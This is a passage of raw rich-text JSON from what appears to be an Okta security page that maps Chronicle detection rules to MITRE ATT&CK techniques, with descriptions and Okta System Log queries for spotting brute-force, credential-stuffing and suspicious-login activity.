identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_mismatch_between_source_and_response_for_verify_push_request.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_mismatch_between_source_and_response_for_verify_push_request\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Mismatch Between Source and Response for Verify Push Request\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and Splunk Combine to Detect Common Attacks\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multiple Failed Users with Invalid Credentials from the same IP\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1078/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1078\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Valid Accounts\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_multiple_users_logins_with_invalid_credentials_from_the_same_ip.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_multiple_users_logins_with_invalid_credentials_from_the_same_ip\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Detects multiple user logins with invalid credentials from a single IP.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log events for Okta ThreatInsight\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Reported Suspicious Activity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1078/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1078\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Valid Account\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_user_suspicious_activity_reported.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_user_suspicious_activity_reported\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: An Okta user reports suspicious activity in response to an end user security notification.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/suspicious-activity-reporting.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Suspicious Activity Reporting\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"user.account.report_suspicious_activity_by_enduser\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multiple Failed Requests to Access Okta Applications\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1550/004/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1550.004\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use Alternate Authentication Material: Web Session Cookie\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_multiple_failed_requests_to_access_applications.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_multiple_failed_requests_to_access_applications\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detects multiple failed requests to access applications\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and Splunk Combine to Detect Common Attacks\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight Alert: Suspected Brute Force\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/001/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.001\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brute Force: Password Guessing\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_threatinsight_suspected_brute_force_attack.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_threatinsight_suspected_brute_force_attack\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Okta ThreatInsight detects multiple login failures from the same IP across one or more Okta orgs\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log events for Okta ThreatInsight\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" and outcome.reason eq \\\"Login Failures\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight Alert: Suspected Targeted Brute Force\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brute Force\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_threatinsight_targeted_brute_force_attack.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_threatinsight_targeted_brute_force_attack\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"NEW: Okta ThreatInsight detects access requests from known malicious IPs targeting a specific org.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log events for Okta ThreatInsight\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.attack.start\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight Alert: Login Failure with High Unknown Users\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ID\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1110/004/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1110.004\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Technique\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Brute Force: Credential Stuffing\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Chronicle identifier\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/chronicle/detection-rules/blob/main/rules/community/okta/okta_threatinsight_login_failure_with_high_unknown_users.yaral\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"okta_threatinsight_login_failure_with_high_unknown_users\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta's ThreatInsight can identify multiple login failures with high unknown users count from the same IP across one or more Okta orgs.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Reference\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log events for Okta ThreatInsight\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta System Log Query\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.threat.detected\\\" AND outcome.reason co \\\"Login failures with high unknown users count\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight Alert: Suspected Password Spray 